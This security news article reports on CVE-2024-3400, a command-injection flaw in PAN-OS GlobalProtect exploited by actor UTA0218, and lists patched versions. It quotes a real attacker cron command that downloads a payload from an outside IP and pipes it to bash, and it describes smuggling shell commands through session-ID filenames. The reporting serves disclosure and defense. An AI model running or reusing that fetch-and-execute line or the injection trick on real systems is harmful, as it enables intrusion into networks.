Palo Alto Networks has divulged additional information regarding a critical security flaw afflicting PAN-OS, which has become a target for exploitation by nefarious entities in the wild.
The corporation delineated the vulnerability, identified as CVE-2024-3400 with a CVSS score of 10.0, as “complex,” arising from the confluence of two glitches in versions PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 of the software.
“In the initial instance, the GlobalProtect service inadequately authenticated the session ID format prior to their storage. This facilitated the storage of an empty file bearing the chosen filename of the attacker,” elucidated Chandan B. N., senior director of product security at Palo Alto Networks.
“The subsequent glitch (operating under the assumption that the files were system-generated) incorporated the filenames into a command.”
It merits mention that while neither of the issues carries critical severity individually, when combined, they could culminate in unauthenticated remote shell command execution.
Palo Alto Networks asserted that the threat actor behind the zero-day exploitation of the flaw, identified as UTA0218, executed a two-pronged assault to attain command execution on susceptible devices. This activity is being monitored under the moniker Operation MidnightEclipse.
As previously disclosed by both Volexity and the network security company’s own Unit 42 threat intelligence division, this process entails dispatching specially crafted requests containing the command to be executed, subsequently executed via a backdoor known as UPSTYLE.
“The initial persistence mechanism established by UTA0218 involved configuring a cron job tasked with employing wget to fetch a payload from an assailant-controlled URL, with its output directed to stdout and piped to bash for execution,” detailed Volexity last week.
“The attacker employed this method to deploy and execute specific commands and download reverse proxy tools such as GOST (GO Simple Tunnel).”
Unit 42 asserted its inability to ascertain the commands executed via this mechanism – wget -qO- hxxp://172.233.228[.]93/policy | bash – but deduced that the cron job-based implant is likely utilized for post-exploitation endeavors.
“In phase 1, the assailant transmits a meticulously crafted shell command instead of a valid session ID to GlobalProtect,” Chandan expounded. “This results in the creation of an empty file on the system, bearing an embedded command as its filename, as dictated by the assailant.”
“In phase 2, an unsuspecting scheduled system task that executes periodically employs the filename provided by the attacker in a command. This leads to the execution of the assailant-supplied command with elevated privileges.”
While Palo Alto Networks initially indicated that successful exploitation of CVE-2024-3400 necessitated the firewall configurations for GlobalProtect gateway or GlobalProtect portal (or both) and the activation of device telemetry, the corporation subsequently affirmed that device telemetry does not influence the issue.
This determination is based on fresh findings from Bishop Fox, which uncovered workarounds to weaponize the flaw in a manner that obviates the need for telemetry to be enabled on a device for infiltration to occur.
The corporation has also broadened the scope of patches for the flaw beyond the primary versions in recent days to encompass other frequently utilized maintenance releases:
- PAN-OS 10.2.9-h1
- PAN-OS 10.2.8-h3
- PAN-OS 10.2.7-h8
- PAN-OS 10.2.6-h3
- PAN-OS 10.2.5-h6
- PAN-OS 10.2.4-h16
- PAN-OS 10.2.3-h13
- PAN-OS 10.2.2-h5
- PAN-OS 10.2.1-h2
- PAN-OS 10.2.0-h3
- PAN-OS 11.0.4-h1
- PAN-OS 11.0.4-h2
- PAN-OS 11.0.3-h10
- PAN-OS 11.0.2-h4
- PAN-OS 11.0.1-h4
- PAN-OS 11.0.0-h3
- PAN-OS 11.1.2-h3
- PAN-OS 11.1.1-h1
- PAN-OS 11.1.0-h3
Given the active exploitation of CVE-2024-3400 and the availability of a proof-of-concept (PoC) exploit code, users are strongly advised to expeditiously apply the hotfixes to mitigate potential threats.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also incorporated the vulnerability into its Known Exploited Vulnerabilities (KEV) inventory, mandating federal agencies to secure their devices by April 19, 2024.
Per information shared by the Shadowserver Foundation, an estimated 22,542 internet-exposed firewall devices are susceptible to CVE-2024-3400. The majority of these devices are located in the U.S., Japan, India, Germany, the U.K., Canada, Australia, France, and China as of April 18, 2024.
